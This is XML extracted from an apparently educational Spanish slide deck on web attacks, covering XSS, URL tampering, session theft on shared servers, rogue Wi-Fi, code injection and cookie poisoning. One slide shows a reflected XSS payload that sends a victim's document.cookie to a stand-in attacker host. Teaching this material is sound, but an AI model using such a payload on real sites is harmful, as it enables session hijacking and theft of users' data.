    <dgm:cxn modelId="{CA0BA767-B689-4D5F-AD53-07FF6EB0A368}" srcId="{C0485DC6-9B42-41C1-B55D-7EED87EBBBBD}" destId="{90795222-E689-410F-B69C-5B7492A7A9FE}" srcOrd="0" destOrd="0" parTransId="{25CBF3C3-7567-447D-99E0-1A630FF91F53}" sibTransId="{2BAF4E8B-49BB-4704-B7A9-3A9EC4C937A4}"/>
    <dgm:cxn modelId="{C823EEF7-E442-487B-B49E-B6726072391D}" srcId="{90795222-E689-410F-B69C-5B7492A7A9FE}" destId="{0A573EE3-F783-4DEC-A3AD-DB00D69AB387}" srcOrd="0" destOrd="0" parTransId="{71EB3E8A-0954-4407-94EF-FB4EF214E9F4}" sibTransId="{CD83B9F9-9569-49AD-8993-4F8A6FB3DECC}"/>
    <dgm:cxn modelId="{3EA5509D-E3AA-4DE0-8F9B-3C7B164A9BF5}" srcId="{90795222-E689-410F-B69C-5B7492A7A9FE}" destId="{61590EE7-98D9-4188-9529-B639DB5BE2A4}" srcOrd="1" destOrd="0" parTransId="{76FC7A4C-CBA0-478A-AFA3-1B9F7728E430}" sibTransId="{42BCDD31-9925-43BD-A31B-8F0345ACA322}"/>
    <dgm:cxn modelId="{2DAA4021-9D61-4026-879A-CA48FA59E360}" type="presOf" srcId="{61590EE7-98D9-4188-9529-B639DB5BE2A4}" destId="{7C9D8099-9F37-449D-849D-6813161A2E30}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList3"/>
    <dgm:cxn modelId="{9E8DE822-C33F-4432-A1BF-17DE93D2C7E6}" type="presOf" srcId="{90795222-E689-410F-B69C-5B7492A7A9FE}" destId="{3255D9C8-627F-4200-BDDE-4E648F85E983}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList3"/>
    <dgm:cxn modelId="{5407AE85-9E6B-4857-9337-DFC2702A34E5}" type="presParOf" srcId="{41EB9611-7FCC-4C80-AE04-8EEAE5CA569A}" destId="{3255D9C8-627F-4200-BDDE-4E648F85E983}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList3"/>
    <dgm:cxn modelId="{BB597C42-2593-45FC-8A4D-182F9C78531D}" type="presParOf" srcId="{41EB9611-7FCC-4C80-AE04-8EEAE5CA569A}" destId="{70AF0818-8322-4733-AC50-C70D5F3D25AA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList3"/>
    <dgm:cxn modelId="{71F26FD9-9DBD-4E7D-9351-EB8C3087FB1C}" type="presParOf" srcId="{70AF0818-8322-4733-AC50-C70D5F3D25AA}" destId="{12AE330B-2954-4157-8EEF-4AB95C140D1A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList3"/>
    <dgm:cxn modelId="{3E4DAE8C-AC77-435B-A547-48F1E5ED9EEE}" type="presParOf" srcId="{70AF0818-8322-4733-AC50-C70D5F3D25AA}" destId="{7C9D8099-9F37-449D-849D-6813161A2E30}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList3"/>
    <dgm:cxn modelId="{D1E22F10-300B-4F97-A42B-DCDAB5E09DD7}" type="presParOf" srcId="{70AF0818-8322-4733-AC50-C70D5F3D25AA}" destId="{A3011D72-EC3E-45BF-8EB8-6F8B23AD0261}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList3"/>
    <dgm:cxn modelId="{2C3EAA76-219F-42DD-8219-03C621E287C7}" type="presParOf" srcId="{41EB9611-7FCC-4C80-AE04-8EEAE5CA569A}" destId="{F0152D29-F963-4D17-83DA-5D69E0E8D63F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1EC03-67B0-4665-9F3F-6934A1F5A9EC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="13716" y="2057808"/>
          <a:ext cx="2634703" cy="15808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http://www.ejemplo.com/privado.php?usuario=jorge</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="60017" y="2104109"/>
        <a:ext cx="2542101" cy="1488219"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{46C8107A-3FA3-4540-B15A-68DB3C2F5446}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2911890" y="2521516"/>
          <a:ext cx="558557" cy="6534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/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2911890" y="2652197"/>
        <a:ext cx="390990" cy="392044"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{302D1419-5332-4947-9EF4-7012ACEEF774}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3702301" y="2057808"/>
          <a:ext cx="2634703" cy="15808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http://www.ejemplo.com/privado.php?usuario=luis</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="es-MX" sz="600" kern="1200" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" sz="600" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3748602" y="2104109"/>
        <a:ext cx="2542101" cy="1488219"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9DF7525D-5BB0-4812-9876-9C78AFE21F99}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6600474" y="2521516"/>
          <a:ext cx="558557" cy="6534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/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6600474" y="2652197"/>
        <a:ext cx="390990" cy="392044"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{094E209A-8048-482A-B31F-65CC80F574E3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7390885" y="2057808"/>
          <a:ext cx="2634703" cy="15808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Verificar si tiene acceso</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" sz="2900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7437186" y="2104109"/>
        <a:ext cx="2542101" cy="14882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D8DF4-53A9-40D4-AD99-810CF75C7D90}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4449" y="798280"/>
          <a:ext cx="2023331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atacante</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" sz="1900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4449" y="798280"/>
        <a:ext cx="2023331" cy="547200"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{16551DD0-CFFA-4535-A6EE-368CA9455203}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="418867" y="1345480"/>
          <a:ext cx="2023331" cy="20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err="1" smtClean="0"/>
            <a:t>Envia</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="es-ES" sz="1900" kern="1200" dirty="0" smtClean="0"/>
            <a:t> mail con un link con etiqueta &lt;script&gt;</a:t>
          </a:r>
          <a:endParaRPr lang="es-E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incrustada </a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" sz="1900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="478128" y="1404741"/>
        <a:ext cx="1904809" cy="1933478"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DF789F79-7B05-44FA-9640-E4604D893283}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2334511" y="820005"/>
          <a:ext cx="650267" cy="5037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/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2334511" y="920755"/>
        <a:ext cx="499142" cy="302251"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7781D153-CE8A-4DB2-AB8E-43C48D0C4E33}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3254700" y="798280"/>
          <a:ext cx="2023331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victima</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" sz="1900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3254700" y="798280"/>
        <a:ext cx="2023331" cy="547200"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BABCD728-5E7E-459E-BE08-DE5FDA4D18A6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3669117" y="1345480"/>
          <a:ext cx="2023331" cy="20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Abre el link y el script se ejecuta</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" sz="1900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3728378" y="1404741"/>
        <a:ext cx="1904809" cy="1933478"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D13EFB59-5236-4A81-8EF4-F20AD73512FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5584761" y="820005"/>
          <a:ext cx="650267" cy="5037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/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5584761" y="920755"/>
        <a:ext cx="499142" cy="302251"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{683D1A49-9795-43B0-97AA-FCAC4D5F3172}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6504951" y="798280"/>
          <a:ext cx="2023331" cy="820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resultado</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" sz="1900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6504951" y="798280"/>
        <a:ext cx="2023331" cy="547200"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A36BF611-F42D-499C-8A8D-29AF9E6AE570}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6919368" y="1345480"/>
          <a:ext cx="2023331" cy="20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Robo de información del usuario</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" sz="1900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6978629" y="1404741"/>
        <a:ext cx="1904809" cy="19334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8D51B-00E2-4244-AEC7-C14CB7D265B0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="752623" y="0"/>
          <a:ext cx="8529737" cy="400255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459B1F-21D2-4709-A8CC-EA3DB8191B02}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="340052" y="1200767"/>
          <a:ext cx="3010495" cy="16010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Creo wifi sin clave en lugar público</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" sz="2900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="418207" y="1278922"/>
        <a:ext cx="2854185" cy="1444712"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6BBAE9B8-A355-48F1-B9DB-D48D76E15FDF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3512244" y="1200767"/>
          <a:ext cx="3010495" cy="16010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Usuarios se conectan</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" sz="2900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3590399" y="1278922"/>
        <a:ext cx="2854185" cy="1444712"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{137F0481-A3C2-405C-BD32-9E515B024DEA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6684436" y="1200767"/>
          <a:ext cx="3010495" cy="16010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Posibilidad de ver todo el trafico de red</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" sz="2900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6762591" y="1278922"/>
        <a:ext cx="2854185" cy="14447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5D9C8-627F-4200-BDDE-4E648F85E983}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="8128000" cy="162560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Servidor compartido</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" sz="2800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="8128000" cy="1625600"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{12AE330B-2954-4157-8EEF-4AB95C140D1A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3968" y="1625600"/>
          <a:ext cx="2706687" cy="34137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los archivos físicos de las sesiones se guardan, por defecto, en un directorio común para todas las páginas web del servidor</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" sz="2300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3968" y="1625600"/>
        <a:ext cx="2706687" cy="3413760"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7C9D8099-9F37-449D-849D-6813161A2E30}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2710656" y="1625600"/>
          <a:ext cx="2706687" cy="34137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Todas las personas que tengan alojada su web, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="es-ES" sz="2300" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>puden</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="es-ES" sz="2300" kern="1200" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="es-ES" sz="2300" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>accder</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="es-ES" sz="2300" kern="1200" dirty="0" smtClean="0"/>
            <a:t> a archivos de sesiones</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" sz="2300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2710656" y="1625600"/>
        <a:ext cx="2706687" cy="3413760"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A3011D72-EC3E-45BF-8EB8-6F8B23AD0261}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5417343" y="1625600"/>
          <a:ext cx="2706687" cy="341376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300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>lista de identificadores de sesión válidos con sólo leer la lista de archivos del directorio común</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" sz="2300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5417343" y="1625600"/>
        <a:ext cx="2706687" cy="3413760"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F0152D29-F963-4D17-83DA-5D69E0E8D63F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="5039360"/>
          <a:ext cx="8128000" cy="37930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6C05-17F5-44E0-A618-6588F956867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6524-0086-4C5E-8AF7-484BF49C4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3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6C05-17F5-44E0-A618-6588F956867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6524-0086-4C5E-8AF7-484BF49C4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4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6C05-17F5-44E0-A618-6588F956867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6524-0086-4C5E-8AF7-484BF49C4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6C05-17F5-44E0-A618-6588F956867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6524-0086-4C5E-8AF7-484BF49C49EC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39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6C05-17F5-44E0-A618-6588F956867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6524-0086-4C5E-8AF7-484BF49C4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58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6C05-17F5-44E0-A618-6588F956867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6524-0086-4C5E-8AF7-484BF49C4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23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6C05-17F5-44E0-A618-6588F956867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6524-0086-4C5E-8AF7-484BF49C4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5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6C05-17F5-44E0-A618-6588F956867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6524-0086-4C5E-8AF7-484BF49C4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83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6C05-17F5-44E0-A618-6588F956867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6524-0086-4C5E-8AF7-484BF49C4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6C05-17F5-44E0-A618-6588F956867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6524-0086-4C5E-8AF7-484BF49C4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9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6C05-17F5-44E0-A618-6588F956867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6524-0086-4C5E-8AF7-484BF49C4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1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6C05-17F5-44E0-A618-6588F956867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6524-0086-4C5E-8AF7-484BF49C4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6C05-17F5-44E0-A618-6588F956867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6524-0086-4C5E-8AF7-484BF49C4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9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6C05-17F5-44E0-A618-6588F956867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6524-0086-4C5E-8AF7-484BF49C4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8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6C05-17F5-44E0-A618-6588F956867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6524-0086-4C5E-8AF7-484BF49C4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6C05-17F5-44E0-A618-6588F956867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6524-0086-4C5E-8AF7-484BF49C4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6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6C05-17F5-44E0-A618-6588F956867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6524-0086-4C5E-8AF7-484BF49C4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9206C05-17F5-44E0-A618-6588F9568675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96524-0086-4C5E-8AF7-484BF49C49E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76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1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/>
              <a:t>ROBO EN SERVIDOR COMPARTIDO</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" cap="all" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US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334741440"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="188666" y="127331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Resultado de imagen para servidor compartid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672" y="3262982"/>
            <a:ext cx="3452968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8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Motivos de ataque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31849" y="2160966"/>
            <a:ext cx="8592611" cy="3555615"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-CO" dirty="0" smtClean="0"/>
              <a:t>Sitios web creciendo continuamente</a:t>
            </a:r>
            <a:endParaRPr lang="es-CO" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CO" dirty="0" smtClean="0"/>
              <a:t>Aplicaciones de negocios diversificados en la web</a:t>
            </a:r>
            <a:endParaRPr lang="es-CO" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CO" dirty="0" err="1" smtClean="0"/>
              <a:t>Ventjas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CO" dirty="0" smtClean="0"/>
              <a:t> económicas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CO" dirty="0" smtClean="0"/>
              <a:t>Recursos sistema</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Hacktivismo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CO" dirty="0" smtClean="0"/>
              <a:t>aburrimiento</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-CO" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Resultado de imagen para web ha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473" y="3201353"/>
            <a:ext cx="5515701" cy="310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9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Ataques</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> URL de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>tipo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>semántico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 involucran a un usuario modificando la URL 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Por </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>esto, los datos GET son un target más frecuente para atacadores sobre todo nuevos.</a:t>
            </a:r>
            <a:endParaRPr lang="en-U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434397448"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1103311" y="875211"/>
          <a:ext cx="10039306" cy="5696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74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cap="all" dirty="0"/>
              <a:t>CROSS-SITE SCRIPTING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646111" y="1444003"/>
            <a:ext cx="9934802" cy="494339"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-CO" dirty="0" err="1"/>
              <a:t>Insercion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CO" dirty="0"/>
              <a:t> de caracteres especiales en la comunicación </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CO" dirty="0" smtClean="0"/>
              <a:t>cliente-servidor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646111" y="2186191"/>
            <a:ext cx="642089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Cross Site Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1"/>
              <a:t>persistente</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-MX" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" smtClean="0"/>
              <a:t>Si </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>el código que hemos insertado se queda almacenado en el servidor, por ejemplo formando parte de una contribución en un foro, el ataque se dice que es </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" smtClean="0"/>
              <a:t>persistente</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-MX" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2" descr="Resultado de imagen para foro con link engaÃ±o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006" y="1938342"/>
            <a:ext cx="4630283" cy="472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61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Site Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>persistente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599059"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1482205" y="1649052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-1" y="5303519"/>
            <a:ext cx="35139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http://mibanco.com/account.php/variable=""&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>script&gt;document.location=http:/tipomalo.com/cgi-bin/cookie.cgi""%20+document.cookie&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;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376788" y="1391583"/>
            <a:ext cx="11157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 el código que insertamos no se queda almacenado en la web, sino que va embebido dentro de un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" smtClean="0"/>
              <a:t>enlace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0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Inyección de código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3678" y="1504278"/>
            <a:ext cx="8946541" cy="4195481"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" smtClean="0"/>
              <a:t>ocurre </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>cuando es posible enviar datos inesperados a un intérprete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frecuentemente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>en consultas SQL, LDAP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>Xpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t> o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>NoSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-MX" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" smtClean="0"/>
              <a:t>fáciles </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>de encontrar cuando se examina el código, sin embargo son difíciles de descubrir mediante pruebas funcionales. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="Resultado de imagen para code in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672" y="3960224"/>
            <a:ext cx="6096000" cy="289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38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Peticiones</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>falsificadas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8729" y="1492122"/>
            <a:ext cx="7648801" cy="4195481"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" smtClean="0"/>
              <a:t>tipo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>de ataque que consiste en enviar peticiones falsas utilizando herramientas especiales para conseguirlo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" smtClean="0"/>
              <a:t>.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Estas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>peticiones, por lo general, aparecen en forma de pop-ups en páginas web con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" smtClean="0"/>
              <a:t>publicidad.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-MX" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" smtClean="0"/>
              <a:t> Utiliza una herramienta de línea de comandos para conseguir una comunicación directa con un servidor, conectándose en el puerto en el que el servidor escucha</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="Resultado de imagen para ventanas de publicid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529" y="2488381"/>
            <a:ext cx="4040941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9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Cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CO" dirty="0" err="1" smtClean="0"/>
              <a:t>poisoning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4226" y="1452026"/>
            <a:ext cx="8946541" cy="4195481"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" smtClean="0"/>
              <a:t>consiste </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>en modificar el contenido una cookie  con el fin  de saltar algunos mecanismos de seguridad que se basan en este </a:t>
            </a:r>
            <a:r>
